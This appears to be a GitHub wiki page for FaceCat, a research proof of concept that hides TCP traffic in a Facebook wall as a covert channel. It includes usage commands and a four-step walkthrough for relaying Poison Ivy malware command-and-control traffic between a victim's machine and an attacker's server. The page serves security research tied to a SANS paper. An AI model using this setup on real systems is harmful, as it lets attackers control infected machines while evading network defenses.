-
Notifications
You must be signed in to change notification settings - Fork 5
Home
FaceCat is a tool developed as a Proof of Concept regarding Covert Channels over Social Networks.
FaceCat is a FaceBook NetCat, and can be used to hide TCP traffic within a FaceBook Wall.
You can DOWNLOAD it or you can watch a couple of demos: TCP Chat, Poison Ivy.
WARNING! FaceCat is a PoC and it isn't updated in a regular basis, so if FaceBook changes it would be necesary to make some fixes in the code. If you update it for your own demos, please send a PULL REQUEST.
You can read more about FaceCat in my SANS GCIH Gold Paper.
$ ./facecat.py
Usage: facecat.py [options]
Options:
-h, --help show this help message and exit
-w WALL, --wall=WALL wall pipe account
-c HOST, --host=HOST connection host
-p PORT, --port=PORT listening or connection port
-v, --verbose verbose output
1 - Create a Poison Ivy (or any other malware) sample. It should connect to 127.0.0.1:3460 as a C&C.
2 - Run a server mode facecat in the victim's machine. The FaceBook account user as a cover channel is wall1@gmail.com:
facecat.py –v –m wall1@gmail.com –p 3460
3 - Run the Poison Ivy C&C in the attacker's machine and then run a client mode facecat (it connects to the Poison Ivy C&C via TCP and to the server mode facecat via the covert channel):
facecat.py –v –m wall1@gmail.com –c 127.0.0.1 –p 3460
4 - Run the Poison Ivy sample in the victim's machine. It connects to the server mode facecat that relays the communications though the facebook covert channel. The client mode facecat connects to the C&C and complete the relay channel.